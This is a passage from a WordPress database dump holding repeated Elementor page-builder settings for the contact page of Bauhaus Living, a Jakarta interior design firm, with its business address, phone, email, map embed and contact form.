right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4074,4900,'_elementor_page_assets','a:0:{}'),(4075,4900,'_elementor_pro_version','3.8.1'),(4076,4901,'_wp_page_template','elementor_header_footer'),(4077,4901,'_elementor_edit_mode','builder'),(4078,4901,'_elementor_template_type','wp-page'),(4079,4901,'_elementor_version','3.8.1'),(4080,4901,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!\",\"description\":\"Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4081,4901,'_elementor_page_assets','a:0:{}'),(4082,4901,'_elementor_pro_version','3.8.1'),(4083,4902,'_wp_page_template','elementor_header_footer'),(4084,4902,'_elementor_edit_mode','builder'),(4085,4902,'_elementor_template_type','wp-page'),(4086,4902,'_elementor_version','3.8.1'),(4087,4902,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!\",\"description\":\"Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4088,4902,'_elementor_page_assets','a:0:{}'),(4089,4902,'_elementor_pro_version','3.8.1'),(4090,4903,'_wp_page_template','elementor_header_footer'),(4091,4903,'_elementor_edit_mode','builder'),(4092,4903,'_elementor_template_type','wp-page'),(4093,4903,'_elementor_version','3.8.1'),(4094,4903,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\"